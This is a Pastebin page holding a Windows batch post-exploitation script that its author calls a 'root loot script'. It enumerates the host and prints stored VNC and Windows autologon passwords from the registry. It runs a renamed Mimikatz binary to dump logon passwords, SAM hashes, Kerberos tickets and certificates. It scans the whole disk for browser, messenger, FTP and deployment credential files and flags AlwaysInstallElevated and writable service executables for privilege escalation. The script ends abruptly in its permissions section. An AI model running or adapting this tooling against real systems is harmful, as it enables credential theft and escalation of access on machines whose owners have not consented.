API tools faq
paste
Advertisement
Guest User

Jollyfrogs-batch

a guest
Sep 18th, 2015
5,742
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Winbatch 26.32 KB | None | 0 0
raw download clone embed print report
  1. @echo OFF
  2. call:credits
  3. call:CheckOSbitrate
  4. call:CheckOSversion
  5. call:checkprerequisitefiles
  6.  
  7. call:checkquickwins
  8. call:getfirewallinformation
  9. call:getcomputerinformation
  10. call:dumphashespasseskerberoscerts
  11. call:findinterestingfiles
  12. call:findinterestingregistrykeys
  13. call:findpasswords
  14. call:checkweakpermissions
  15. call:cleanup
  16. goto end
  17.  
  18. :credits
  19. echo.----------------------------------------------------
  20. echo.Author: Jollyfrogs, Brisbane QLD
  21. echo.A root loot script I used to learn batch techniquesP, needs TLC
  22. echo.----------------------------------------------------
  23. echo.
  24. goto:eof
  25.  
  26. :CheckOSbitrate
  27. IF DEFINED ProgramFiles(x86) (set OSbit=64) else (set OSbit=32)
  28. goto:eof
  29.  
  30. :checkprerequisitefiles
  31. REM SOME OF THESE COMMANDS MIGHT GENERATE ERRORS SO WE CATCH THEM ALL HERE
  32. echo ====================================================================
  33. echo ====================== IGNORE THESE ERRORS =========================
  34. dir jollykatz%OSbit%.exe /a/s/b 1> nul 2> NUL
  35. IF %ERRORLEVEL% == 0 set jollykatz=1
  36. for /f "tokens=1 delims=" %%a in ('whoami') do set whoami=%%a
  37. for /f "tokens=1 delims=" %%a in ('netsh /? ^| findstr \.*.irewal.*.*') do set netshfirewall=%%a
  38.  
  39. REM
  40. REM check registry for the following registry entries:
  41. REM
  42. reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
  43. IF %ERRORLEVEL% == 0 (
  44.     reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated | Find "0x1" 1> NUL
  45.     IF %ERRORLEVEL% == 0 (set alwaysinstallelevated=1)
  46. )
  47. reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage" 1>NUL
  48. IF %ERRORLEVEL% == 0 (set IE6found=1)
  49. reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2" 1>NUL
  50. IF %ERRORLEVEL% == 0 (set IE7found=1)
  51. reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords" 1>NUL
  52. IF %ERRORLEVEL% == 0 (set AIM6found=1)
  53. reg query "HKCU\SOFTWARE\AIM\AIMPRO" 1>NUL
  54. IF %ERRORLEVEL% == 0 (set AIMPROfound=1)
  55. reg query "HKCU\SOFTWARE\Beyluxe Messenger" 1>NUL
  56. IF %ERRORLEVEL% == 0 (set BEYLUXEfound=1)
  57. reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting" 1>NUL
  58. IF %ERRORLEVEL% == 0 (set BIGANTfound=1)
  59. reg query "HKCU\SOFTWARE\Camfrog\Client" 1>NUL
  60. IF %ERRORLEVEL% == 0 (set CAMFROGfound=1)
  61. reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts" 1>NUL
  62. IF %ERRORLEVEL% == 0 (set GOOGLETALKfound=1)
  63. reg query "HKCU\SOFTWARE\IMVU" 1>NUL
  64. IF %ERRORLEVEL% == 0 (set IMVUfound=1)
  65. reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application" 1>NUL
  66. IF %ERRORLEVEL% == 0 (set NIMBUZZfound=1)
  67. reg query "HKCU\SOFTWARE\Paltalk" 1>NUL
  68. IF %ERRORLEVEL% == 0 (set PALTALKfound=1)
  69. reg query "HKCU\SOFTWARE\Yahoo\Pager" 1>NUL
  70. IF %ERRORLEVEL% == 0 (set YAHOOPAGERfound=1)
  71. reg query "HKCU\SOFTWARE\IncrediMail" 1>NUL
  72. IF %ERRORLEVEL% == 0 (set INCREDIMAILfound=1)
  73. reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook" 1>NUL
  74. IF %ERRORLEVEL% == 0 (set OUTLOOK2013found=1)
  75. reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles" 1>NUL
  76. IF %ERRORLEVEL% == 0 (set OUTLOOK2010POSTNTfound=1)
  77. reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles" 1>NUL
  78. IF %ERRORLEVEL% == 0 (set OUTLOOK2010PRENTfound=1)
  79. reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts" 1>NUL
  80. IF %ERRORLEVEL% == 0 (set OUTLOOK98MAILONLYfound=1)
  81. reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts" 1>NUL
  82. IF %ERRORLEVEL% == 0 (set OUTLOOK98NORMALfound=1)
  83. reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites" 1>NUL
  84. IF %ERRORLEVEL% == 0 (set DREAMWEAVERfound=1)
  85. reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail" 1>NUL
  86. IF %ERRORLEVEL% == 0 (set GMAILDESKTOPfound=1)
  87. reg query "HKCU\SOFTWARE\DownloadManager\Passwords" 1>NUL
  88. IF %ERRORLEVEL% == 0 (set IDMfound=1)
  89. reg query "HKCU\SOFTWARE\Google\Picasa" 1>NUL
  90. IF %ERRORLEVEL% == 0 (set PICASAfound=1)
  91. reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password" 1> NUL
  92. IF %ERRORLEVEL% == 0 (set realvncpassfound=1)
  93. reg query HKLM\Software\TightVNC\Server /v Password | Find "Password" 1> NUL
  94. IF %ERRORLEVEL% == 0 (set tightvncpassfound1=1)
  95. reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly" 1> NUL
  96. IF %ERRORLEVEL% == 0 (set tightvncpassfound2=1)
  97. reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password" 1> NUL
  98. IF %ERRORLEVEL% == 0 (set tigervncpassfound=1)
  99. reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password" 1> NUL
  100. IF %ERRORLEVEL% == 0 (set vnc3passfound1=1)
  101. reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
  102. IF %ERRORLEVEL% == 0 (set vnc3passfound2=1)
  103. reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password" 1> NUL
  104. IF %ERRORLEVEL% == 0 (set vnc3passfound3=1)
  105. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword" 1> NUL
  106. IF %ERRORLEVEL% == 0 (
  107.     For /F "Tokens=2*" %%a In ('reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword') Do set defaultloginpass=%%b
  108.     REM we check if the registry key is not null
  109.     IF NOT [%defaultloginpass%] == [] set winautologinpassfound=1
  110.     set defaultloginpass=
  111. )
  112. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername" 1> NUL
  113. IF %ERRORLEVEL% == 0 (set winautologinuserfound=1)
  114. reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname" 1> NUL
  115. IF %ERRORLEVEL% == 0 (set winautologindomainfound=1)
  116. REM
  117. REM
  118. echo ====================== IGNORE THESE ERRORS =========================
  119. echo ====================================================================
  120. echo.
  121. goto:eof
  122.  
  123. :CheckOSVersion
  124. @echo off
  125. ver | find "2003" > nul
  126. if %ERRORLEVEL% == 0 goto ver_2003
  127. ver | find "XP" > nul
  128. if %ERRORLEVEL% == 0 goto ver_xp
  129. ver | find "2000" > nul
  130. if %ERRORLEVEL% == 0 goto ver_2000
  131. ver | find "NT" > nul
  132. if %ERRORLEVEL% == 0 goto ver_nt
  133. if not exist %SystemRoot%\system32\systeminfo.exe goto versioncheckwarnthenexit
  134. systeminfo | find "OS Name" > %TEMP%\osname.txt
  135. FOR /F "usebackq delims=: tokens=2" %%i IN (%TEMP%\osname.txt) DO set vers=%%i
  136. echo %vers% | find "Windows 7" > nul
  137. if %ERRORLEVEL% == 0 goto ver_7
  138. echo %vers% | find "Windows Server 2008" > nul
  139. if %ERRORLEVEL% == 0 goto ver_2008
  140. echo %vers% | find "Windows Vista" > nul
  141. if %ERRORLEVEL% == 0 goto ver_vista
  142. goto warnthenexit
  143. :ver_7
  144. :Run Windows 7 specific commands here.
  145. set OSVersion=WIN7
  146. goto versioncheckexit
  147. :ver_2008
  148. :Run Windows Server 2008 specific commands here.
  149. set OSVersion=WIN2008
  150. goto versioncheckexit
  151. :ver_vista
  152. :Run Windows Vista specific commands here.
  153. set OSVersion=WINVISTA
  154. goto versioncheckexit
  155. :ver_2003
  156. :Run Windows Server 2003 specific commands here.
  157. set OSVersion=WIN2003
  158. goto versioncheckexit
  159. :ver_xp
  160. :Run Windows XP specific commands here.
  161. set OSVersion=WINXP
  162. goto versioncheckexit
  163. :ver_2000
  164. :Run Windows 2000 specific commands here.
  165. set OSVersion=WIN2000
  166. goto versioncheckexit
  167. :ver_nt
  168. :Run Windows NT specific commands here.
  169. set OSVersion=WINNT
  170. goto versioncheckexit
  171. :versioncheckwarnthenexit
  172. set OSVersion=UNDETERMINED
  173. goto:versioncheckexit
  174. :versioncheckexit
  175. goto:eof
  176.  
  177. :checkquickwins
  178.     systeminfo > systeminfo.txt
  179.     REM === Generic tests across all Windows versions here
  180.     IF DEFINED alwaysinstallelevated (
  181.         echo **** !!! VULNERABLE TO ALWAYSINSTALLELEVATED !!! ****
  182.         set alwaysinstallelevated=
  183.         echo.
  184.     )
  185.     IF DEFINED realvncpassfound (
  186.         echo **** !!! REALVNC PASS FOUND !!! ****
  187.         reg query HKLM\SOFTWARE\RealVNC\vncserver /v Password | Find "Password"
  188.         echo ************************************
  189.         set realvncpassfound=
  190.         echo.
  191.     )
  192.     IF DEFINED tightvncpassfound1 (
  193.         echo **** !!! TIGHTVNC PASS FOUND !!! ****
  194.         reg query HKLM\Software\TightVNC\Server /v Password | Find "Password"
  195.         echo *************************************
  196.         set tightvncpassfound1=
  197.         echo.
  198.     )
  199.     IF DEFINED tightvncpassfound2 (
  200.         echo **** !!! TIGHTVNC VIEWONLY PASS FOUND !!! ****
  201.         reg query HKLM\Software\TightVNC\Server /v PasswordViewOnly | Find "PasswordViewOnly"
  202.         echo **********************************************
  203.         set tightvncpassfound2=
  204.         echo.
  205.     )
  206.     IF DEFINED tigervncpassfound (
  207.         echo **** !!! TIGERVNC PASS FOUND !!! ****
  208.         reg query HKLM\Software\TigerVNC\WinVNC4 /v Password | Find "Password"
  209.         echo *************************************
  210.         set tigervncpassfound=
  211.         echo.
  212.     )
  213.     IF DEFINED vnc3passfound1 (
  214.         echo **** !!! VNC3 PASS FOUND !!! ****
  215.         reg query HKLM\SOFTWARE\ORL\WinVNC3\Default /v Password | Find "Password"
  216.         echo *********************************
  217.         set vnc3passfound1=
  218.         echo.
  219.     )
  220.     IF DEFINED vnc3passfound2 (
  221.         echo **** !!! VNC3 PASS FOUND !!! ****
  222.         reg query HKLM\SOFTWARE\ORL\WinVNC3 /v Password | Find "Password"
  223.         echo *********************************
  224.         set vnc3passfound2=
  225.         echo.
  226.     )
  227.     IF DEFINED vnc3passfound3 (
  228.         echo **** !!! VNC3 PASS FOUND !!! ****
  229.         reg query HKCU\Software\ORL\WinVNC3 /v Password | Find "Password"
  230.         echo *********************************
  231.         set vnc3passfound3=
  232.         echo.
  233.     )
  234.     IF DEFINED winautologinpassfound (
  235.         echo **** !!! WINDOWS AUTOLOGIN PASS FOUND !!! ****
  236.         reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultPassword | Find "DefaultPassword"
  237.         echo **********************************************
  238.  
  239.         IF DEFINED Winautologinuserfound (
  240.             reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultUsername | Find "DefaultUsername"
  241.             set winautologinuserfound=
  242.         )
  243.  
  244.         IF DEFINED winautologindomainfound (
  245.             reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /v DefaultDomainname | Find "DefaultDomainname"
  246.             set winautologindomainfound=
  247.         )
  248.  
  249.         set winautologinpassfound=
  250.     )
  251. goto:eof
  252.     if %OSVersion%==WINXP (
  253.         REM Maybe we can do something nice with this, haven't found a really good use yet other than it does work, too many KB's and interdependencies on KB patches
  254.         REM for /f "tokens=1 delims=" %%a in ('type systeminfo.txt ^| findstr /C:"KB147222"') do set MYKB=%%a
  255.         REM if NOT DEFINED MYKB echo == VULNERABLE TO KBasfjsdfj
  256.         REM set MYKB=
  257.         REM echo.
  258.     )
  259. goto:eof
  260.  
  261. :getfirewallinformation
  262. echo.
  263. IF DEFINED netshfirewall (
  264.         echo.
  265.         echo.Firewall Status
  266.         echo.---------------
  267.         netsh firewall show state
  268.         echo.
  269.         echo.
  270.         echo.Firewall configuration details
  271.         echo.------------------------------
  272.         echo.
  273.         netsh firewall show config
  274.         echo.
  275.     ) ELSE (
  276.         echo === NOTE: The netsh firewall command was not found, skipping checks ===
  277.     )
  278. echo.
  279. goto:eof
  280.  
  281. :getcomputerinformation
  282. echo.
  283. echo.This computer is running %OSbit%-bit Windows
  284. echo.
  285. IF DEFINED whoami (
  286.     echo.
  287.     echo.Are we running an elevated command prompt?
  288.     echo.------------------------------------------
  289.     for /f "tokens=1 delims=" %%a in ('whoami /groups ^| findstr \.*High.Man') do set runningelevatedprompt=%%a
  290.         IF DEFINED runningelevatedprompt (
  291.                 echo YES, we ARE!
  292.             ) ELSE (
  293.                 echo Sadly, no...
  294.             )
  295.         echo.
  296.         echo.User Groups
  297.         echo.-----------
  298.         whoami /groups
  299.         echo.
  300.     ) ELSE (
  301.         echo === NOTE: The whoami command was not found, skipping checks ===
  302.     )
  303. echo.
  304. echo.User Accounts
  305. echo.-------------
  306. net users
  307. echo.
  308. echo.Systeminfo
  309. echo.----------
  310. systeminfo
  311. echo.
  312. echo.Netstat -ano
  313. echo.------------
  314. netstat -ano
  315. echo.
  316. echo.Scheduled tasks
  317. echo.---------------
  318. schtasks /query /fo LIST /v
  319. echo.
  320. echo.Task to service mapping
  321. echo.-----------------------
  322. tasklist /SVC
  323. echo.
  324. echo.Network settings
  325. echo.----------------
  326. ipconfig /all
  327. echo.
  328. echo.Running windows services
  329. echo.------------------------
  330. net start
  331. echo.
  332. echo.Listing Windows drivers
  333. echo.-----------------------
  334. DRIVERQUERY
  335. echo.
  336. echo.Dumping Windows registry to registrydump.txt
  337. echo.--------------------------------------------
  338. reg query HKLM /s > registrydump.txt
  339. reg query HKCU /s >> registrydump.txt
  340. echo.
  341. echo.Environment variables
  342. echo.---------------------
  343. set
  344. echo.
  345. echo.Group Policy
  346. echo.------------
  347. gpresult /R 1>2>NUL
  348. IF %ERRORLEVEL% == 1 (
  349.     REM WINXP
  350.     gpresult
  351. ) ELSE (
  352.     REM WIN7
  353.     gpresult /R
  354. )
  355. echo.
  356. REM ** ALEX TO ADD CREDENUMERATE **
  357. goto:eof
  358.  
  359. :dumphashespasseskerberoscerts
  360. echo.Hashes, passwords, kerberos tickets and certificates
  361. echo.-----------------
  362. IF NOT DEFINED jollykatz echo === NOTE: Jollykatz%OSbit%.exe not found, skipping jollykatz checks ===
  363. IF NOT DEFINED jollykatz goto:eof
  364. echo.
  365. echo.sekurlsa::logonPasswords full
  366. echo.------
  367. jollykatz%OSbit%.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"
  368. echo.
  369. echo.lsadump::sam
  370. echo.------
  371. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
  372. echo.
  373. echo.sekurlsa::tickets /export
  374. echo.------
  375. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
  376. echo.
  377. echo.crypto::certificates /export (CERT_SYSTEM_STORE_CURRENT_USER)
  378. echo.------
  379. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_CURRENT_USER /store:my /export" "exit"
  380. echo.
  381. echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE)
  382. echo.------
  383. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:my /export" "exit"
  384. echo.
  385. echo.crypto::certificates /export (CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE)
  386. echo.------
  387. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE /store:my /export" "exit"
  388. echo.
  389. echo.crypto::certificates /export (CERT_SYSTEM_STORE_USERS)
  390. echo.------
  391. jollykatz%OSbit%.exe "privilege::debug" "token::elevate" "crypto::capi" "crypto::cng" "crypto::certificates /systemstore:CERT_SYSTEM_STORE_USERS /store:my /export" "exit"
  392. echo.
  393. goto:eof
  394.  
  395. :findinterestingfiles
  396. echo.Interesting files and directories
  397. echo.---------------------------------
  398. dir C:\* /a/s/b > dirlisting.txt
  399. type dirlisting.txt | findstr /I \.*proof[.]txt$
  400. type dirlisting.txt | findstr /I \.*network-secret[.]txt$
  401. type dirlisting.txt | findstr /I \.*ssh.*[.]ini$
  402. type dirlisting.txt | findstr /I \.*ultravnc[.]ini$
  403. type dirlisting.txt | findstr /I \.*vnc[.]ini$
  404. type dirlisting.txt | findstr /I \.*bthpan[.]sys$
  405. type dirlisting.txt | findstr /I \.*\\repair$
  406. type dirlisting.txt | findstr /I \.*passw*. | findstr /VI \.*.chm$ | findstr /VI \.*.log$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$
  407. type dirlisting.txt | findstr /I \.*[.]vnc$
  408. type dirlisting.txt | findstr /I \.*groups[.]xml$
  409. type dirlisting.txt | findstr /I \.*printers[.]xml$
  410. type dirlisting.txt | findstr /I \.*drives[.]xml$
  411. type dirlisting.txt | findstr /I \.*scheduledtasks[.]xml$
  412. type dirlisting.txt | findstr /I \.*services[.]xml$
  413. type dirlisting.txt | findstr /I \.*datasources[.]xml$
  414. type dirlisting.txt | findstr /I \.*.rsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.rat$
  415. type dirlisting.txt | findstr /I \.*.dsa.*[.].*$ | findstr /VI \.*.dll$ | findstr /VI \.*.exe$ | findstr /VI \.*.gif$ | findstr /VI \.*.handsafe[.]reg$
  416. type dirlisting.txt | findstr /I \.*[.]dbx$
  417. type dirlisting.txt | findstr /I \.*.account.*.$ | findstr /VI \.*.User.Account.Picture.*. | findstr /VI \.*.bmp$
  418. type dirlisting.txt | findstr /I \.*ntds[.].*$
  419. type dirlisting.txt | findstr /I \.*hiberfil[.].*$
  420. type dirlisting.txt | findstr /I \.*boot[.]ini$
  421. type dirlisting.txt | findstr /I \.*win[.]ini$
  422. type dirlisting.txt | findstr /I \.*.\\config\\RegBack
  423. type dirlisting.txt | findstr /I \.*.\\CCM\\logs
  424. type dirlisting.txt | findstr /I \.*.\\iis.[.]log$
  425. type dirlisting.txt | findstr /I \.*.\\Content.IE.\\index.dat$
  426. type dirlisting.txt | findstr /I \.*.\\inetpub\\logs\\LogFiles
  427. type dirlisting.txt | findstr /I \.*.\\httperr\\httpe.*.[.]log$
  428. type dirlisting.txt | findstr /I \.*.\\logfiles\\w3svc1\\ex.*.[.]log$
  429. type dirlisting.txt | findstr /I \.*.\\Panther\\ | findstr /VI \.*.Resources\\Themes\\.*.
  430. type dirlisting.txt | findstr /I \.*.syspre.*,[.]...$
  431. type dirlisting.txt | findstr /I \.*.unatten.*.[.]txt$
  432. type dirlisting.txt | findstr /I \.*.unatten.*.[.]xml$
  433. type dirlisting.txt | findstr /I \.*Login.Data$
  434. type dirlisting.txt | findstr /I \.*Web.Data$
  435. type dirlisting.txt | findstr /I \.*Credentials.Store$
  436. type dirlisting.txt | findstr /I \.*Credential.Store$
  437. type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
  438. REM Avant Browser:
  439. type dirlisting.txt | findstr /I \.*forms[.]dat[.]vdt$
  440. type dirlisting.txt | findstr /I \.*default\\formdata\\forms[.]dat$
  441. REM Comodo Dragon
  442. type dirlisting.txt | findstr /I \.*Dragon\\User.Data\\Default.*
  443. REM CoolNovo
  444. type dirlisting.txt | findstr /I \.*ChromePlus\\User.Data\\Default.*
  445. REM Firefox
  446. type dirlisting.txt | findstr /I \.*Firefox\\Profiles\\.*[.]default$
  447. type dirlisting.txt | findstr /I \.*key3[.]db$
  448. REM Flock Browser
  449. type dirlisting.txt | findstr /I \.*Flock\\User.Data\\Default.*
  450. REM Google Chrome
  451. type dirlisting.txt | findstr /I \.*Chrome\\User.Data\\Default.*
  452. type dirlisting.txt | findstr /I \.*Chrome.SXS\\User.Data\\Default.*
  453. REM Internet Explorer
  454. type dirlisting.txt | findstr /I \.*Microsoft\\Credentials.*
  455. REM Maxthon
  456. type dirlisting.txt | findstr /I \.*MagicFill.*
  457. type dirlisting.txt | findstr /I \.*MagicFill2[.]dat$
  458. REM Opera
  459. type dirlisting.txt | findstr /I \.*Wand[.]dat$
  460. REM Safari
  461. type dirlisting.txt | findstr /I \.*keychain[.]plist$
  462. REM SeaMonkey
  463. type dirlisting.txt | findstr /I \.*signons[.]sqlite$
  464. REM AIM
  465. type dirlisting.txt | findstr /I \.*aimx[.]bin$
  466. REM Digsby
  467. type dirlisting.txt | findstr /I \.*logininfo[.]yaml$
  468. type dirlisting.txt | findstr /I \.*digsby[.]dat$
  469. REM Meebo Notifier
  470. type dirlisting.txt | findstr /I \.*MeeboAccounts[.]txt$
  471. REM Miranda IM
  472. type dirlisting.txt | findstr /I \.*Miranda\\.*[.]dat$
  473. REM MySpace IM
  474. type dirlisting.txt | findstr /I \.*MySpace\\IM\\users[.]txt$
  475. REM Pidgin
  476. type dirlisting.txt | findstr /I \.*Accounts[.]xml$
  477. REM Skype
  478. type dirlisting.txt | findstr /I \.*Skype.*config[.]xml$
  479. REM Tencent QQ
  480. type dirlisting.txt | findstr /I \.*Registry[.]db$
  481. REM Trillian
  482. type dirlisting.txt | findstr /I \.*accounts[.]ini$
  483. REM XFire
  484. type dirlisting.txt | findstr /I \.*XfireUser[.]ini$
  485. REM Foxmail
  486. type dirlisting.txt | findstr /I \.*Account[.]stg$
  487. type dirlisting.txt | findstr /I \.*Accounts[.]tdat$
  488. REM ThunderBird
  489. type dirlisting.txt | findstr /I \.*signons[.]sqlite$
  490. REM Windows Live Mail
  491. type dirlisting.txt | findstr /I \.*[.]oeaccount$
  492. REM FileZilla
  493. type dirlisting.txt | findstr /I \.*recentservers[.]xml$
  494. REM FlashFXP
  495. type dirlisting.txt | findstr /I \.*Sites[.]dat$
  496. REM FTPCommander
  497. type dirlisting.txt | findstr /I \.*Ftplist[.]txt$
  498. REM SmartFTP
  499. type dirlisting.txt | findstr /I \.*SmartFTP.*[.]xml$
  500. REM WS_FTP
  501. type dirlisting.txt | findstr /I \.*ws_ftp[.]ini$
  502. REM Heroes of Newerth
  503. type dirlisting.txt | findstr /I \.*login[.]cfg$
  504. REM JDownloader
  505. type dirlisting.txt | findstr /I \.*JDownloader.*
  506. type dirlisting.txt | findstr /I \.*database[.]script$
  507. type dirlisting.txt | findstr /I \.*accounts[.]ejs$
  508. REM OrbitDownloader
  509. type dirlisting.txt | findstr /I \.*sitelogin[.]dat$
  510. REM Seesmic
  511. type dirlisting.txt | findstr /I \.*data[.]db$
  512. REM SuperPutty
  513. type dirlisting.txt | findstr /I \.*sessions[.]xml$
  514. REM TweetDeck
  515. type dirlisting.txt | findstr /I \.*TweetDeck.*
  516. type dirlisting.txt | findstr /I \.*[.]localstorage$
  517. echo.
  518. goto:eof
  519.  
  520. :findinterestingregistrykeys
  521. REM Source: securityxploded dot com slash passwordsecrets dot php
  522. IF EXIST AIM6found (reg query "HKCU\SOFTWARE\America Online\AIM6\Passwords")
  523. IF EXIST AIMPROfound (reg query "HKCU\SOFTWARE\AIM\AIMPRO")
  524. IF EXIST IE6found (reg query "HKCU\SOFTWARE\Microsoft\Protected Storage System Provider" /v "Protected Storage")
  525. IF EXIST IE7found (reg query "HKCU\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2")
  526. IF EXIST BEYLUXEfound (reg query "HKCU\SOFTWARE\Beyluxe Messenger")
  527. IF EXIST BIGANTfound (reg query "HKCU\SOFTWARE\BigAntSoft\BigAntMessenger\Setting")
  528. IF EXIST CAMFROGfound (reg query "HKCU\SOFTWARE\Camfrog\Client")
  529. IF EXIST GOOGLETALKfound (reg query "HKCU\SOFTWARE\Google\Google Talk\Accounts")
  530. IF EXIST IMVUfound (reg query "HKCU\SOFTWARE\IMVU")
  531. IF EXIST NIMBUZZfound (reg query "HKCU\SOFTWARE\Nimbuzz\PCClient\Application")
  532. IF EXIST PALTALKfound (reg query "HKCU\SOFTWARE\Paltalk")
  533. IF EXIST YAHOOPAGERfound (reg query "HKCU\SOFTWARE\Yahoo\Pager")
  534. IF EXIST INCREDIMAIL (reg query "HKCU\SOFTWARE\IncrediMail")
  535. IF EXIST OUTLOOK2013found (reg query "HKCU\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook")
  536. IF EXIST OUTLOOK2010POSTNTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messenging Subsystem\Profiles")
  537. IF EXIST OUTLOOK2010PRENTfound (reg query "HKCU\SOFTWARE\Microsoft\Windows Messenging Subsystem\Profiles")
  538. IF EXIST OUTLOOK98MAILONLYfound (reg query "HKCU\SOFTWARE\Microsoft\Office\Outlookt\OMI Account Manager\Accounts")
  539. IF EXIST OUTLOOK98NORMALfound (reg query "HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts")
  540. IF EXIST DREAMWEAVERfound (reg query "HKCU\SOFTWARE\Adobe\Common\10\Sites")
  541. IF EXIST GMAILDESKTOPfound (reg query "HKCU\SOFTWARE\Google\Google Desktop\Mailboxes\Gmail")
  542. IF EXIST IDMfound (reg query "HKCU\SOFTWARE\DownloadManager\Passwords")
  543. IF EXIST PICASAfound (reg query "HKCU\SOFTWARE\Google\Picasa")
  544. REM
  545.  
  546. :findpasswords
  547. echo.Searching for passwords (this can take a while)
  548. echo.-----------------------------------------------
  549. findstr /si pwd= *.xml *.ini *.txt
  550. findstr /si password= *.xml *.ini *.txt
  551. findstr /si pass= *.xml *.ini *.txt
  552. goto:eof
  553.  
  554. :checkweakpermissions
  555. echo.Searching for weak service permissions (this can take a while)
  556. echo.--------------------------------------------------------------
  557. if exist serviceexes.txt del serviceexes.txt
  558. if exist dirlisting.txt del dirlisting.txt
  559. dir \ /a/s/b > dirlisting.txt
  560. for /f "tokens=1 delims=," %%a in ('tasklist /SVC /FO CSV ^| findstr /I \.*exe*. ^| findstr /VI "smss.exe csrss.exe winlogon.exe services.exe spoolsv.exe explorer.exe ctfmon.exe wmiprvse.exe msmsgs.exe notepad.exe lsass.exe svchost.exe findstr.exe cmd.exe tasklist.exe"') do (findstr %%a$ | findstr /VI "\.*winsxs\\*.") <dirlisting.txt >> serviceexes.txt
  561. REM In the line below we parse serviceexes.txt and check each line for write access. We check write access by appending (writing) nothing to the file, we then use batch logic to test results and output results in echo
  562. REM for /f "tokens=*" %%a in (serviceexes.txt) do 2>nul (>>%%a echo off) && (echo === !!! RW access to service executable: %%a !!! ===) || (call)
  563. REM Ninja magic to find out if we have write access, only partially reliable so decided to go with cacls instead
  564. REM @echo off & 2>nul (>>"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" echo off) && (echo RW access) || (echo no RW access) & echo on
  565.  
  566. for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Users:"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
  567. for /f "tokens=*" %%a in (serviceexes.txt) do (cacls "%%a"|findstr /I "Everyone"|findstr /I "W F") && (echo === !!! Write access to service executable: %%a !!! ===) || (call)
  568.  
  569. echo.Files and folder with Read-Write access
  570. echo.---------------------------------------
  571. dir accesschk.exe /a/s/b 1>2>NUL
  572. IF %ERRORLEVEL% == 0 (
  573.     echo === NOTE: accesschk.exe not found, skipping accesschk file permissions checks ===
  574.     goto:eof
  575. )
  576.  
  577.     accesschk.exe /accepteula 1>2>NUL
  578.    
  579.     accesschk.exe -uwqs "Everyone" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
  580.     accesschk.exe -uwqs "Users" c:\*.* | findstr /VI "\.*system32\\Setup*. \.*system32\\spool\\PRINTERS*. \.*Registration\\CRMLog*. \.*Debug\\UserMode*. \.*WINDOWS\\Tasks*. \.*WINDOWS\\Temp*. \.*Documents.And.Settings*. \.*RECYCLER*. \.*System.Volume.Information*."
  581.     accesschk.exe -uwqs "Authenticated Users" c:\*.*  | findstr /VI \.*System.Volume.Information*. | findstr /VI \.*Documents.And.Settings*.
  582.    
  583.     echo.Searching for weak service permissions
  584.     echo.--------------------------------------
  585.     accesschk.exe -uwcqv "Authenticated Users" * | Find "RW " 1> NUL
